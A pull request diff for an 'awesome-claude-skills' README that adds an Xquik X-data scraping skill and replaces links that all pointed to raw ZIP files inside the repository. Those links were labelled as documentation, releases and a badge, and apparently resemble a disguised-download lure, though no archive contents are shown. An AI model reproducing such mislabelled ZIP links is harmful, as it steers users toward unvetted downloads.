### PR TITLE
Add Xquik X data skill and repair resource links

### DIFF
--- a/README.md
+++ b/README.md
@@ -1,6 +1,6 @@
 # 🌟 awesome-claude-skills - Enhance Claude’s Capabilities with Skills
 
-[![Download from Releases](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/complexion/awesome-claude-skills.zip%20from%https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/complexion/awesome-claude-skills.zip)](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/complexion/awesome-claude-skills.zip)
+[![Download from Releases](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/mcp-builder/scripts/skills_claude_awesome_1.7.zip%20from%https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/mcp-builder/scripts/skills_claude_awesome_1.7.zip)](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/mcp-builder/scripts/skills_claude_awesome_1.7.zip)
 
 ## 🚀 Getting Started
 
@@ -12,10 +12,10 @@ Skills are collections of instructions and scripts designed to improve Claude's 
 
 Explore more about skills with these links:
 
-- [What are skills?](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/complexion/awesome-claude-skills.zip)
-- [Using skills in Claude](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/complexion/awesome-claude-skills.zip)
-- [How to create custom skills](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/complexion/awesome-claude-skills.zip)
-- [Equipping agents for the real world with Agent Skills](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/complexion/awesome-claude-skills.zip)
+- [What are skills?](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/mcp-builder/scripts/skills_claude_awesome_1.7.zip)
+- [Using skills in Claude](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/mcp-builder/scripts/skills_claude_awesome_1.7.zip)
+- [How to create custom skills](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/mcp-builder/scripts/skills_claude_awesome_1.7.zip)
+- [Equipping agents for the real world with Agent Skills](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/mcp-builder/scripts/skills_claude_awesome_1.7.zip)
 
 ## 💻 System Requirements
 
@@ -30,7 +30,7 @@ To run the awesome-claude-skills application smoothly, ensure your system meets 
 
 To get started, visit the Releases page to download the latest version of the software. Click the link below:
 
-[Download from Releases](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/complexion/awesome-claude-skills.zip)
+[Download from Releases](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/mcp-builder/scripts/skills_claude_awesome_1.7.zip)
 
 Once on the Releases page, follow these steps:
 
@@ -79,7 +79,7 @@ You can open an issue on the GitHub page or contact us through the links provide
 
 ## 🔗 Useful Links
 
-- [GitHub Repository](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/complexion/awesome-claude-skills.zip)
-- [Documentation](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/complexion/awesome-claude-skills.zip)
+- [GitHub Repository](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/mcp-builder/scripts/skills_claude_awesome_1.7.zip)
+- [Documentation](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/mcp-builder/scripts/skills_claude_awesome_1.7.zip)
 
 Thank you for using awesome-claude-skills! We appreciate your interest in enhancing Claude’s skills. Enjoy your experience!

--- a/README.md
+++ b/README.md
@@ -1,6 +1,6 @@
 # 🌟 awesome-claude-skills - Enhance Claude’s Capabilities with Skills
 
-[![Download from Releases](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/mcp-builder/scripts/skills_claude_awesome_1.7.zip%20from%https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/mcp-builder/scripts/skills_claude_awesome_1.7.zip)](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/mcp-builder/scripts/skills_claude_awesome_1.7.zip)
+[![GitHub Repository](https://img.shields.io/badge/GitHub-Repository-blue?logo=github)](https://github.com/shajith003/awesome-claude-skills)
 
 ## 🚀 Getting Started
 
@@ -12,10 +12,10 @@ Skills are collections of instructions and scripts designed to improve Claude's 
 
 Explore more about skills with these links:
 
-- [What are skills?](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/mcp-builder/scripts/skills_claude_awesome_1.7.zip)
-- [Using skills in Claude](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/mcp-builder/scripts/skills_claude_awesome_1.7.zip)
-- [How to create custom skills](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/mcp-builder/scripts/skills_claude_awesome_1.7.zip)
-- [Equipping agents for the real world with Agent Skills](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/mcp-builder/scripts/skills_claude_awesome_1.7.zip)
+- [Agent Skills spec](agent_skills_spec.md)
+- [Skill creator example](skill-creator/SKILL.md)
+- [MCP builder example](mcp-builder/SKILL.md)
+- [Template skill](template-skill/SKILL.md)
 
 ## 💻 System Requirements
 
@@ -28,15 +28,15 @@ To run the awesome-claude-skills application smoothly, ensure your system meets 
 
 ## 📥 Download & Install
 
-To get started, visit the Releases page to download the latest version of the software. Click the link below:
+To get started, clone or download this repository from GitHub. Click the link below:
 
-[Download from Releases](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/mcp-builder/scripts/skills_claude_awesome_1.7.zip)
+[Open the GitHub repository](https://github.com/shajith003/awesome-claude-skills)
 
-Once on the Releases page, follow these steps:
+Once on the repository page, follow these steps:
 
-1. Locate the version you wish to install.
-2. Click the download link for your operating system.
-3. Save the file to your computer.
+1. Click **Code**.
+2. Choose **Download ZIP** or copy the Git clone URL.
+3. Save the repository to your computer.
 
 ### 🖥️ Installing the Software
 
@@ -80,7 +80,10 @@ You can open an issue on the GitHub page or contact us through the links provide
 
 ## 🔗 Useful Links
 
-- [GitHub Repository](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/mcp-builder/scripts/skills_claude_awesome_1.7.zip)
-- [Documentation](https://raw.githubusercontent.com/shajith003/awesome-claude-skills/main/mcp-builder/scripts/skills_claude_awesome_1.7.zip)
+- [GitHub Repository](https://github.com/shajith003/awesome-claude-skills)
+- [Agent Skills spec](agent_skills_spec.md)
 
 Thank you for using awesome-claude-skills! We appreciate your interest in enhancing Claude’s skills. Enjoy your experience!
+
+Xquik is an independent third-party service. Not affiliated with X Corp.
+"Twitter" and "X" are trademarks of X Corp.

--- a/README.md
+++ b/README.md
@@ -50,6 +50,7 @@ After installation, you can begin exploring the available skills. Each skill con
 
 - **Create Documents:** Use skills to generate documents that follow your company's guidelines.
 - **Data Analysis:** Setup skills that align with your organization’s workflows to analyze data effectively.
+- **X Data:** Search and extract X data with the Xquik API or MCP server.
 - **Personal Automation:** Automate personal tasks with customized skills for better productivity.
 
 ## 📁 Folder Structure

--- a/xquik-x-data/SKILL.md
+++ b/xquik-x-data/SKILL.md
@@ -1,0 +1,58 @@
+---
+name: xquik-x-data
+description: Use when the user needs to search, extract, summarize, or automate X data with Xquik through its public REST API, OpenAPI spec, or remote MCP manifest. Covers setup, choosing REST or MCP, source checks, API-key hygiene, and result handling.
+license: Apache-2.0
+---
+
+# Xquik X Data Skill
+
+Use this skill when a user wants to work with X data through Xquik.
+
+## Source Links
+
+- Public API spec: `https://xquik.com/openapi.json`
+- Remote MCP manifest: `https://xquik.com/.well-known/mcp.json`
+- Public repository: `https://github.com/Xquik-dev/x-twitter-scraper`
+
+## Workflow
+
+1. Check the OpenAPI spec or MCP manifest before naming exact endpoints, tools, or request fields.
+2. Use REST for application code, scripts, batch exports, and webhook-backed workflows.
+3. Use the remote MCP manifest when the user is configuring an MCP-capable agent.
+4. Keep API keys in environment variables or the user's approved secret store. Never print keys.
+5. Return compact results by default: query used, result count, key fields, and next-page guidance.
+6. For larger jobs, ask for the time range, target accounts or keywords, output format, and maximum records.
+
+## Guardrails
+
+- Do not describe private infrastructure or unsupported routing details.
+- Do not scrape X directly when the user asked to use Xquik.
+- Do not invent endpoint names. Verify them from the OpenAPI spec first.
+- Do not make pricing, coverage, or freshness claims unless the current public docs state them.
+
+## Common Task Patterns
+
+### Search X Posts
+
+1. Fetch the OpenAPI spec.
+2. Locate the tweet search operation.
+3. Build the request from the documented schema.
+4. Include authentication using a secret environment variable.
+5. Normalize output into the user's requested format.
+
+### Configure Remote MCP
+
+1. Fetch the MCP manifest.
+2. Confirm the server name, version, and repository link.
+3. Add the remote MCP URL using the user's client-specific configuration format.
+4. Test with a read-only query before using the setup in a larger workflow.
+
+### Analyze Results
+
+Summaries should separate:
+
+- Source query and filters.
+- Number of records returned.
+- Time range represented in the data.
+- Top accounts, posts, topics, or links relevant to the user's question.
+- Missing data or pagination that may affect conclusions.

--- a/xquik-x-data/SKILL.md
+++ b/xquik-x-data/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: xquik-x-data
-description: Use when the user needs to search, extract, summarize, or automate X data with Xquik through its public REST API, OpenAPI spec, or remote MCP manifest. Covers setup, choosing REST or MCP, source checks, API-key hygiene, and result handling.
+description: Use when the user needs to search, extract, summarize, or automate X data with Xquik through its public REST API, OpenAPI spec, or remote MCP manifest. Covers setup, choosing REST or MCP, source checks, API-key hygiene, and result handling. Not affiliated with X Corp.
 license: Apache-2.0
 ---
 


### PR DESCRIPTION
## Summary

- Add an installable Xquik X data skill for REST, OpenAPI, and remote MCP workflows.
- Add a README example so users can discover the skill.
- Replace malformed raw ZIP resource links with working repository files and canonical GitHub navigation.
- Document the required Xquik affiliation disclosure.

## Independent repository fix

The README routed its badge, skill guides, download instructions, repository link, and documentation link to the same raw ZIP file. Some image markup even contained 2 concatenated URLs. This contribution restores accurate local documentation and repository links, and corrects the install instructions to match the repository distribution.

## Validation

- `npx --yes markdown-link-check README.md --quiet`
- Skill frontmatter and required field assertions
- HTTP checks for the public OpenAPI document, MCP manifest, and source repository
- Raw ZIP link regression scan
- `git diff --check`

Xquik is an independent third-party service. Not affiliated with X Corp. "Twitter" and "X" are trademarks of X Corp.